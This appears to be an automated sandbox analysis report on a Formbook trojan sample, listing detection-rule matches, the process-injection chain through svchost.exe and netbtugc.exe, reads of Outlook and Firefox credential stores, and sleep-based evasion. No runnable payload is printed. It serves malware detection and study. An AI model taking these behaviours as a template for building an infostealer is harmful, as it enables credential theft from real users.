            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/13
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACA2D5 GetLastError,FormatMessageW,0_2_00ACA2D5
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB8713 AdjustTokenPrivileges,CloseHandle,0_2_00AB8713
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00AB8CC3
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00ACB59E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ADF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00ADF121
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00AD86D0
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A64FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00A64FE9
            Source: C:\Users\user\Desktop\opp46lGmxd.exeFile created: C:\Users\user\AppData\Local\Temp\aut908D.tmpJump to behavior
            Source: opp46lGmxd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000003.1735535328.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1733218388.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3848803016.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3848803016.00000000035E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: opp46lGmxd.exeReversingLabs: Detection: 57%
            Source: opp46lGmxd.exeVirustotal: Detection: 67%
            Source: unknownProcess created: C:\Users\user\Desktop\opp46lGmxd.exe "C:\Users\user\Desktop\opp46lGmxd.exe"
            Source: C:\Users\user\Desktop\opp46lGmxd.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\opp46lGmxd.exe"
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\opp46lGmxd.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\opp46lGmxd.exe"Jump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: opp46lGmxd.exeStatic file information: File size 1161728 > 1048576
            Source: opp46lGmxd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: opp46lGmxd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: opp46lGmxd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: opp46lGmxd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: opp46lGmxd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: opp46lGmxd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: opp46lGmxd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3851208680.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613457617.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
            Source: opp46lGmxd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: opp46lGmxd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: opp46lGmxd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: opp46lGmxd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: opp46lGmxd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ADC304 LoadLibraryA,GetProcAddress,0_2_00ADC304
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A88B85 push ecx; ret 0_2_00A88B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0399225F pushad ; ret 4_2_039927F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039927FA pushad ; ret 4_2_039927F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039C09AD push ecx; mov dword ptr [esp], ecx4_2_039C09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0399283D push eax; iretd 4_2_03992858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03991200 push eax; iretd 4_2_03991369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A2238 pushad ; iretd 4_2_032A2239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032AAB37 push 00000038h; iretd 4_2_032AAB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A6E56 push ebx; iretd 4_2_032A6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A0EAB push ebp; retf 4_2_032A0EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A6CB3 push ebx; iretd 4_2_032A6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03291126 push esp; ret 4_2_03291127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032AD1B0 push es; ret 4_2_032AD1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A101F push es; iretd 4_2_032A1027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A550F pushad ; retf 4_2_032A5510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0329FFA0 push esi; iretd 4_2_0329FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032AFEF5 push FFFFFFBAh; ret 4_2_032AFEF7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038803DA push ebx; ret 4_2_0388042C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0388429A push cs; retf 4_2_038842F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03884268 push cs; retf 4_2_038842F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038847F5 push es; ret 4_2_038847FA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0388D620 push esi; ret 4_2_0388D63B
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A64A35
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AE55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00AE55FD
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A833C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A833C7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 2454Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 7518Jump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100488
            Source: C:\Users\user\Desktop\opp46lGmxd.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868Thread sleep count: 2454 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868Thread sleep time: -4908000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868Thread sleep count: 7518 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868Thread sleep time: -15036000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920Thread sleep count: 48 > 30Jump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\opp46lGmxd.exeAPI/Special instruction interceptor: Address: 3D83264
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
